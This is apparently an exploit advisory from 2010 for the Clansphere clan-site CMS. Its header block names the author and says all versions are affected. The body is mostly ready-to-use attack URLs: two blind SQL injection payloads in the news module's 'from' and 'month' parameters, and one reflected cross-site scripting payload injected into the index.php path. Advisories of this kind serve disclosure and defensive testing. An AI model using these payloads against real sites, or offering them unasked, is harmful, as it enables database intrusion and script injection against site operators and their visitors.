39 lines
No EOL
2.3 KiB
Text
39 lines
No EOL
2.3 KiB
Text
############################################################################
|
|
# #
|
|
# Exploit Title: Clansphere Multiple vulnerabilities #
|
|
# #
|
|
# Date: 24/08/2010 #
|
|
# #
|
|
# Author: Sweet #
|
|
# #
|
|
# Contact : charif38@hotmail.fr #
|
|
# #
|
|
# Software Link: #
|
|
# #
|
|
# Download:http: http://sourceforge.net/projects/clansphere/ #
|
|
# #
|
|
# Version: all #
|
|
# #
|
|
# Tested on: WinXp sp3 #
|
|
# #
|
|
# Risk : HIGHT #
|
|
# #
|
|
# #
|
|
# Description : clansphere offers some nice features for #
|
|
# #
|
|
# you to easily set up and maintain your proper clan site within minutes! #
|
|
# #
|
|
############################################################################
|
|
|
|
1- Blind Sql injection :
|
|
|
|
http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+
|
|
|
|
http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+
|
|
|
|
2-Xss :
|
|
|
|
http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>
|
|
|
|
|
|
Saha Ftourkoum et 1,2,3 viva L'Algerie :)) |